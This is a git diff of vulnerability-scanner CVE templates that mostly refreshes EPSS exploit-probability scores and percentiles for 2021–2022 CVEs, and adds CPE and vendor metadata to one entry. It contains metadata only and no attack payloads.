--git a/http/cves/2021/CVE-2021-43510.yaml b/http/cves/2021/CVE-2021-43510.yaml index fd773aac97..05c371b3aa 100644 --- a/http/cves/2021/CVE-2021-43510.yaml +++ b/http/cves/2021/CVE-2021-43510.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-43510 cwe-id: CWE-89 - epss-score: 0.01901 - epss-percentile: 0.87048 + epss-score: 0.0553 + epss-percentile: 0.92368 cpe: cpe:2.3:a:simple_client_management_system_project:simple_client_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-43574.yaml b/http/cves/2021/CVE-2021-43574.yaml index f34adf5155..7b896f8b15 100644 --- a/http/cves/2021/CVE-2021-43574.yaml +++ b/http/cves/2021/CVE-2021-43574.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-43574 cwe-id: CWE-79 epss-score: 0.00145 - epss-percentile: 0.49646 + epss-percentile: 0.50014 cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-43725.yaml b/http/cves/2021/CVE-2021-43725.yaml index e751aa88c5..5092019ebf 100644 --- a/http/cves/2021/CVE-2021-43725.yaml +++ b/http/cves/2021/CVE-2021-43725.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-43725 cwe-id: CWE-79 - epss-score: 0.0016 - epss-percentile: 0.51978 + epss-score: 0.00149 + epss-percentile: 0.5066 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-43734.yaml b/http/cves/2021/CVE-2021-43734.yaml index 20849c0556..1285e03aaf 100644 --- a/http/cves/2021/CVE-2021-43734.yaml +++ b/http/cves/2021/CVE-2021-43734.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-43734 cwe-id: CWE-22 - epss-score: 0.02295 - epss-percentile: 0.88264 + epss-score: 0.03024 + epss-percentile: 0.89801 cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-43778.yaml b/http/cves/2021/CVE-2021-43778.yaml index a01b177a6b..e00cf2f567 100644 --- a/http/cves/2021/CVE-2021-43778.yaml +++ b/http/cves/2021/CVE-2021-43778.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-43778 cwe-id: CWE-22 epss-score: 0.75886 - epss-percentile: 0.97757 + epss-percentile: 0.97801 cpe: cpe:2.3:a:glpi-project:barcode:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-43798.yaml b/http/cves/2021/CVE-2021-43798.yaml index e43ae9bc7a..2e862e93d7 100644 --- a/http/cves/2021/CVE-2021-43798.yaml +++ b/http/cves/2021/CVE-2021-43798.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-43798 cwe-id: CWE-22 - epss-score: 0.97484 - epss-percentile: 0.9995 + epss-score: 0.97243 + epss-percentile: 0.99779 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-43810.yaml b/http/cves/2021/CVE-2021-43810.yaml index 2d37d7beb5..31326086d1 100644 --- a/http/cves/2021/CVE-2021-43810.yaml +++ b/http/cves/2021/CVE-2021-43810.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-43810 cwe-id: CWE-79 epss-score: 0.00513 - epss-percentile: 0.73678 + epss-percentile: 0.73951 cpe: cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44077.yaml b/http/cves/2021/CVE-2021-44077.yaml index b77b770e1d..17b026c235 100644 --- a/http/cves/2021/CVE-2021-44077.yaml +++ b/http/cves/2021/CVE-2021-44077.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-44077 cwe-id: CWE-306 - epss-score: 0.97373 - epss-percentile: 0.99854 + epss-score: 0.97194 + epss-percentile: 0.99752 cpe: cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11138:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml index 0d8694c816..89bbdf59ea 100644 --- a/http/cves/2021/CVE-2021-44138.yaml +++ b/http/cves/2021/CVE-2021-44138.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-44138 cwe-id: CWE-22 - epss-score: 0.00867 - epss-percentile: 0.80249 + epss-score: 0.02044 + epss-percentile: 0.87693 cpe: cpe:2.3:a:caucho:resin:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-44139.yaml b/http/cves/2021/CVE-2021-44139.yaml index 855ec3fe3b..1159b7ef1a 100644 --- a/http/cves/2021/CVE-2021-44139.yaml +++ b/http/cves/2021/CVE-2021-44139.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-44139 cwe-id: CWE-918 - epss-score: 0.00769 - epss-percentile: 0.78983 + epss-score: 0.01329 + epss-percentile: 0.84504 cpe: cpe:2.3:a:hashicorp:sentinel:1.8.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44152.yaml b/http/cves/2021/CVE-2021-44152.yaml index 5a4ba1fa97..41ca382244 100644 --- a/http/cves/2021/CVE-2021-44152.yaml +++ b/http/cves/2021/CVE-2021-44152.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-44152 cwe-id: CWE-306 - epss-score: 0.66748 - epss-percentile: 0.9749 + epss-score: 0.76593 + epss-percentile: 0.97823 cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-44228.yaml b/http/cves/2021/CVE-2021-44228.yaml index 9ba276dd26..ce57946a67 100644 --- a/http/cves/2021/CVE-2021-44228.yaml +++ b/http/cves/2021/CVE-2021-44228.yaml @@ -18,8 +18,8 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-20,CWE-917 - epss-score: 0.97566 - epss-percentile: 0.99996 + epss-score: 0.97472 + epss-percentile: 0.99956 cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-44427.yaml b/http/cves/2021/CVE-2021-44427.yaml index 7ad88c0cc6..34efaf2914 100644 --- a/http/cves/2021/CVE-2021-44427.yaml +++ b/http/cves/2021/CVE-2021-44427.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-44427 cwe-id: CWE-89 - epss-score: 0.04257 - epss-percentile: 0.91177 + epss-score: 0.04953 + epss-percentile: 0.91911 cpe: cpe:2.3:a:rosariosis:rosariosis:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44451.yaml b/http/cves/2021/CVE-2021-44451.yaml index d63a143025..0d6f0f0e7e 100644 --- a/http/cves/2021/CVE-2021-44451.yaml +++ b/http/cves/2021/CVE-2021-44451.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-44451 cwe-id: CWE-522 - epss-score: 0.00853 - epss-percentile: 0.80105 + epss-score: 0.00857 + epss-percentile: 0.80378 cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-44515.yaml b/http/cves/2021/CVE-2021-44515.yaml index 987e9a5441..a39a9ad966 100644 --- a/http/cves/2021/CVE-2021-44515.yaml +++ b/http/cves/2021/CVE-2021-44515.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-44515 cwe-id: CWE-287 - epss-score: 0.97478 - epss-percentile: 0.99947 + epss-score: 0.97297 + epss-percentile: 0.99818 cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:enterprise:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44528.yaml b/http/cves/2021/CVE-2021-44528.yaml index 67a1c35462..57668b9a64 100644 --- a/http/cves/2021/CVE-2021-44528.yaml +++ b/http/cves/2021/CVE-2021-44528.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-44528 cwe-id: CWE-601 epss-score: 0.00087 - epss-percentile: 0.35778 + epss-percentile: 0.3614 cpe: cpe:2.3:a:rubyonrails:rails:6.0.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml index 94a032de69..25a7b86030 100644 --- a/http/cves/2021/CVE-2021-44529.yaml +++ b/http/cves/2021/CVE-2021-44529.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-44529 cwe-id: CWE-94 - epss-score: 0.95797 - epss-percentile: 0.99192 + epss-score: 0.95982 + epss-percentile: 0.99279 cpe: cpe:2.3:a:ivanti:endpoint_manager_cloud_services_appliance:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44848.yaml b/http/cves/2021/CVE-2021-44848.yaml index 6a1f6ef0d6..9e76b563cd 100644 --- a/http/cves/2021/CVE-2021-44848.yaml +++ b/http/cves/2021/CVE-2021-44848.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-44848 cwe-id: CWE-203 epss-score: 0.01597 - epss-percentile: 0.85774 + epss-percentile: 0.85908 cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45043.yaml b/http/cves/2021/CVE-2021-45043.yaml index 7fb73137e1..e0eaab2dce 100644 --- a/http/cves/2021/CVE-2021-45043.yaml +++ b/http/cves/2021/CVE-2021-45043.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-45043 cwe-id: CWE-22 epss-score: 0.05404 - epss-percentile: 0.9216 + epss-percentile: 0.92276 cpe: cpe:2.3:a:hd-network_real-time_monitoring_system_project:hd-network_real-time_monitoring_system:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml index 6db7ac0c03..cfdd1d4769 100644 --- a/http/cves/2021/CVE-2021-45046.yaml +++ b/http/cves/2021/CVE-2021-45046.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9 cve-id: CVE-2021-45046 cwe-id: CWE-917 - epss-score: 0.97405 - epss-percentile: 0.9988 + epss-score: 0.9741 + epss-percentile: 0.99901 cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45092.yaml b/http/cves/2021/CVE-2021-45092.yaml index a89aff9d9e..003fd18d90 100644 --- a/http/cves/2021/CVE-2021-45092.yaml +++ b/http/cves/2021/CVE-2021-45092.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-45092 cwe-id: CWE-74 epss-score: 0.05789 - epss-percentile: 0.92399 + epss-percentile: 0.925 cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45232.yaml b/http/cves/2021/CVE-2021-45232.yaml index 2f7f22882e..bfb7f6e0e8 100644 --- a/http/cves/2021/CVE-2021-45232.yaml +++ b/http/cves/2021/CVE-2021-45232.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-45232 cwe-id: CWE-306 - epss-score: 0.97298 - epss-percentile: 0.99794 + epss-score: 0.97252 + epss-percentile: 0.99781 cpe: cpe:2.3:a:apache:apisix_dashboard:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45380.yaml b/http/cves/2021/CVE-2021-45380.yaml index 71a3dc4b78..b2030a2b0b 100644 --- a/http/cves/2021/CVE-2021-45380.yaml +++ b/http/cves/2021/CVE-2021-45380.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-45380 cwe-id: CWE-79 - epss-score: 0.02148 - epss-percentile: 0.87858 + epss-score: 0.0157 + epss-percentile: 0.85778 cpe: cpe:2.3:a:appcms:appcms:2.0.101:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml index 8a660c5aa5..e619a521f4 100644 --- a/http/cves/2021/CVE-2021-45422.yaml +++ b/http/cves/2021/CVE-2021-45422.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-45422 cwe-id: CWE-79 epss-score: 0.00218 - epss-percentile: 0.59071 + epss-percentile: 0.59471 cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-45428.yaml b/http/cves/2021/CVE-2021-45428.yaml index 3a2a3fb9a9..aea8650ddb 100644 --- a/http/cves/2021/CVE-2021-45428.yaml +++ b/http/cves/2021/CVE-2021-45428.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-45428 cwe-id: CWE-639 epss-score: 0.08441 - epss-percentile: 0.93587 + epss-percentile: 0.93681 cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-45967.yaml b/http/cves/2021/CVE-2021-45967.yaml index 003f874041..63d3de236b 100644 --- a/http/cves/2021/CVE-2021-45967.yaml +++ b/http/cves/2021/CVE-2021-45967.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-45967 cwe-id: CWE-22 - epss-score: 0.71742 - epss-percentile: 0.97631 + epss-score: 0.71982 + epss-percentile: 0.97697 cpe: cpe:2.3:a:pascom_cloud_phone_system:*:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45968.yaml b/http/cves/2021/CVE-2021-45968.yaml index 65b3b6e38a..a6ebaa42f1 100644 --- a/http/cves/2021/CVE-2021-45968.yaml +++ b/http/cves/2021/CVE-2021-45968.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-45968 cwe-id: CWE-918 - epss-score: 0.01551 - epss-percentile: 0.85551 + epss-score: 0.01828 + epss-percentile: 0.86853 cpe: cpe:2.3:a:jivesoftware:jive:-:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-46005.yaml b/http/cves/2021/CVE-2021-46005.yaml index dc9d53e008..cba4e907e7 100644 --- a/http/cves/2021/CVE-2021-46005.yaml +++ b/http/cves/2021/CVE-2021-46005.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-46005 cwe-id: CWE-79 epss-score: 0.00143 - epss-percentile: 0.49483 + epss-percentile: 0.49847 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-46068.yaml b/http/cves/2021/CVE-2021-46068.yaml index b6d8d3cbf5..f9b3d84058 100644 --- a/http/cves/2021/CVE-2021-46068.yaml +++ b/http/cves/2021/CVE-2021-46068.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-46068 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.34592 + epss-percentile: 0.34952 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46069.yaml b/http/cves/2021/CVE-2021-46069.yaml index 24e4deac39..93b0b7d51c 100644 --- a/http/cves/2021/CVE-2021-46069.yaml +++ b/http/cves/2021/CVE-2021-46069.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-46069 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.34592 + epss-percentile: 0.34952 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46071.yaml b/http/cves/2021/CVE-2021-46071.yaml index b30da81d27..47552e4fb0 100644 --- a/http/cves/2021/CVE-2021-46071.yaml +++ b/http/cves/2021/CVE-2021-46071.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-46071 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.34592 + epss-percentile: 0.34952 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46072.yaml b/http/cves/2021/CVE-2021-46072.yaml index 736f0a24e1..739c0e1590 100644 --- a/http/cves/2021/CVE-2021-46072.yaml +++ b/http/cves/2021/CVE-2021-46072.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-46072 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.34592 + epss-percentile: 0.34952 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46073.yaml b/http/cves/2021/CVE-2021-46073.yaml index e1b46b8cd4..7ff232b95a 100644 --- a/http/cves/2021/CVE-2021-46073.yaml +++ b/http/cves/2021/CVE-2021-46073.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-46073 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.34592 + epss-percentile: 0.34952 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml index 488ee43d2e..940cf3a2b5 100644 --- a/http/cves/2021/CVE-2021-46107.yaml +++ b/http/cves/2021/CVE-2021-46107.yaml @@ -11,14 +11,20 @@ info: reference: - https://raw.githubusercontent.com/Orange-Cyberdefense/CVE-repository/master/PoCs/POC_CVE-2021-46107.py - https://nvd.nist.gov/vuln/detail/CVE-2021-46107 + - https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-46107 cwe-id: CWE-918 + epss-score: 0.01705 + epss-percentile: 0.86333 + cpe: cpe:2.3:a:ligeo-archives:ligeo_basics:02_01-2022:*:*:*:*:*:*:* metadata: verified: true max-request: 3 + vendor: ligeo-archives + product: ligeo_basics shodan-query: title:"Ligeo" fofa-query: title="Ligeo" tags: cve,cve2021,ligeo,ssrf,lfr diff --git a/http/cves/2021/CVE-2021-46379.yaml b/http/cves/2021/CVE-2021-46379.yaml index 38e192dc21..a2d8d2fb5b 100644 --- a/http/cves/2021/CVE-2021-46379.yaml +++ b/http/cves/2021/CVE-2021-46379.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-46379 cwe-id: CWE-601 - epss-score: 0.00247 - epss-percentile: 0.61872 + epss-score: 0.00245 + epss-percentile: 0.62195 cpe: cpe:2.3:o:dlink:dir-850l_firmware:1.08trb03:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46381.yaml b/http/cves/2021/CVE-2021-46381.yaml index 4ef1d7df94..209dc016a1 100644 --- a/http/cves/2021/CVE-2021-46381.yaml +++ b/http/cves/2021/CVE-2021-46381.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-46381 cwe-id: CWE-22 - epss-score: 0.01229 - epss-percentile: 0.8365 + epss-score: 0.01734 + epss-percentile: 0.86431 cpe: cpe:2.3:o:dlink:dap-1620_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-46387.yaml b/http/cves/2021/CVE-2021-46387.yaml index df42c29812..7b56638c17 100644 --- a/http/cves/2021/CVE-2021-46387.yaml +++ b/http/cves/2021/CVE-2021-46387.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-46387 cwe-id: CWE-79 - epss-score: 0.00475 - epss-percentile: 0.72639 + epss-score: 0.00628 + epss-percentile: 0.76611 cpe: cpe:2.3:o:zyxel:zywall_2_plus_internet_security_appliance_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml index 7abb32283b..efefd3cbe0 100644 --- a/http/cves/2021/CVE-2021-46417.yaml +++ b/http/cves/2021/CVE-2021-46417.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-46417 cwe-id: CWE-22 - epss-score: 0.72699 - epss-percentile: 0.97658 + epss-score: 0.66146 + epss-percentile: 0.97535 cpe: cpe:2.3:o:franklinfueling:colibri_firmware:1.8.19.8580:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46422.yaml b/http/cves/2021/CVE-2021-46422.yaml index 0e244d0f7f..0f3cdc857e 100644 --- a/http/cves/2021/CVE-2021-46422.yaml +++ b/http/cves/2021/CVE-2021-46422.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-46422 cwe-id: CWE-78 - epss-score: 0.95441 - epss-percentile: 0.99106 + epss-score: 0.95657 + epss-percentile: 0.99199 cpe: cpe:2.3:o:telesquare:sdt-cs3b1_firmware:1.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46424.yaml b/http/cves/2021/CVE-2021-46424.yaml index 81b42b9952..89daede5c8 100644 --- a/http/cves/2021/CVE-2021-46424.yaml +++ b/http/cves/2021/CVE-2021-46424.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.1 cve-id: CVE-2021-46424 cwe-id: CWE-306 - epss-score: 0.01459 - epss-percentile: 0.85053 + epss-score: 0.01677 + epss-percentile: 0.86225 cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:1.0.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml index 718396095d..d2bcba0c4b 100644 --- a/http/cves/2021/CVE-2021-46704.yaml +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-46704 cwe-id: CWE-78 - epss-score: 0.94979 - epss-percentile: 0.98995 + epss-score: 0.94833 + epss-percentile: 0.99021 cpe: cpe:2.3:a:genieacs:genieacs:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0140.yaml b/http/cves/2022/CVE-2022-0140.yaml index 655226b815..db39684dce 100644 --- a/http/cves/2022/CVE-2022-0140.yaml +++ b/http/cves/2022/CVE-2022-0140.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-0140 cwe-id: CWE-306 - epss-score: 0.01084 - epss-percentile: 0.82506 + epss-score: 0.01279 + epss-percentile: 0.84187 cpe: cpe:2.3:a:vfbpro:visual_form_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0147.yaml b/http/cves/2022/CVE-2022-0147.yaml index 6b251edaf7..6f461ab046 100644 --- a/http/cves/2022/CVE-2022-0147.yaml +++ b/http/cves/2022/CVE-2022-0147.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0147 cwe-id: CWE-79 - epss-score: 0.00133 - epss-percentile: 0.47722 + epss-score: 0.001 + epss-percentile: 0.40828 cpe: cpe:2.3:a:cookieinformation:wp-gdpr-compliance:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0148.yaml b/http/cves/2022/CVE-2022-0148.yaml index 4f6a267a8b..9e529db842 100644 --- a/http/cves/2022/CVE-2022-0148.yaml +++ b/http/cves/2022/CVE-2022-0148.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-0148 cwe-id: CWE-79 - epss-score: 0.00165 - epss-percentile: 0.52528 + epss-score: 0.00144 + epss-percentile: 0.49945 cpe: cpe:2.3:a:premio:mystickyelements:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0149.yaml b/http/cves/2022/CVE-2022-0149.yaml index baddf9d36f..c8b8f5c53c 100644 --- a/http/cves/2022/CVE-2022-0149.yaml +++ b/http/cves/2022/CVE-2022-0149.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0149 cwe-id: CWE-79 - epss-score: 0.00115 - epss-percentile: 0.44376 + epss-score: 0.001 + epss-percentile: 0.40828 cpe: cpe:2.3:a:visser:store_exporter_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0150.yaml b/http/cves/2022/CVE-2022-0150.yaml index 9127f5726f..06b6219b56 100644 --- a/http/cves/2022/CVE-2022-0150.yaml +++ b/http/cves/2022/CVE-2022-0150.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0150 cwe-id: CWE-79 - epss-score: 0.00133 - epss-percentile: 0.47722 + epss-score: 0.001 + epss-percentile: 0.40828 cpe: cpe:2.3:a:wp_accessibility_helper_project:wp_accessibility_helper:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0165.yaml b/http/cves/2022/CVE-2022-0165.yaml index 7e67e03d78..88e437d8e4 100644 --- a/http/cves/2022/CVE-2022-0165.yaml +++ b/http/cves/2022/CVE-2022-0165.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0165 cwe-id: CWE-601 - epss-score: 0.00133 - epss-percentile: 0.47728 + epss-score: 0.001 + epss-percentile: 0.40836 cpe: cpe:2.3:a:king-theme:kingcomposer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0169.yaml b/http/cves/2022/CVE-2022-0169.yaml index ebbe09c335..85fd0c5a2e 100644 --- a/http/cves/2022/CVE-2022-0169.yaml +++ b/http/cves/2022/CVE-2022-0169.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0169 cwe-id: CWE-89 - epss-score: 0.01109 - epss-percentile: 0.82695 + epss-score: 0.01077 + epss-percentile: 0.82618 cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0189.yaml b/http/cves/2022/CVE-2022-0189.yaml index bc46b2f168..0fc98e4fbc 100644 --- a/http/cves/2022/CVE-2022-0189.yaml +++ b/http/cves/2022/CVE-2022-0189.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0189 cwe-id: CWE-79 - epss-score: 0.00133 - epss-percentile: 0.47722 + epss-score: 0.001 + epss-percentile: 0.40828 cpe: cpe:2.3:a:wprssaggregator:wp_rss_aggregator:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0201.yaml b/http/cves/2022/CVE-2022-0201.yaml index b498c6d3b8..651bb75e35 100644 --- a/http/cves/2022/CVE-2022-0201.yaml +++ b/http/cves/2022/CVE-2022-0201.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0201 cwe-id: CWE-79 - epss-score: 0.00115 - epss-percentile: 0.44376 + epss-score: 0.001 + epss-percentile: 0.40828 cpe: cpe:2.3:a:permalink_manager_lite_project:permalink_manager_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0206.yaml b/http/cves/2022/CVE-2022-0206.yaml index 5f96ef9dd5..78ab42f681 100644 --- a/http/cves/2022/CVE-2022-0206.yaml +++ b/http/cves/2022/CVE-2022-0206.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0206 cwe-id: CWE-79 - epss-score: 0.00122 - epss-percentile: 0.45705 + epss-score: 0.00106 + epss-percentile: 0.42795 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0208.yaml b/http/cves/2022/CVE-2022-0208.yaml index 7cdc2ce04f..b18fb93f52 100644 --- a/http/cves/2022/CVE-2022-0208.yaml +++ b/http/cves/2022/CVE-2022-0208.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0208 cwe-id: CWE-79 - epss-score: 0.00122 - epss-percentile: 0.45705 + epss-score: 0.00106 + epss-percentile: 0.42795 cpe: cpe:2.3:a:mappresspro:mappress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0212.yaml b/http/cves/2022/CVE-2022-0212.yaml index 2a2255bd12..3f172d7e88 100644 --- a/http/cves/2022/CVE-2022-0212.yaml +++ b/http/cves/2022/CVE-2022-0212.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0212 cwe-id: CWE-79 - epss-score: 0.00099 - epss-percentile: 0.40308 + epss-score: 0.00086 + epss-percentile: 0.35887 cpe: 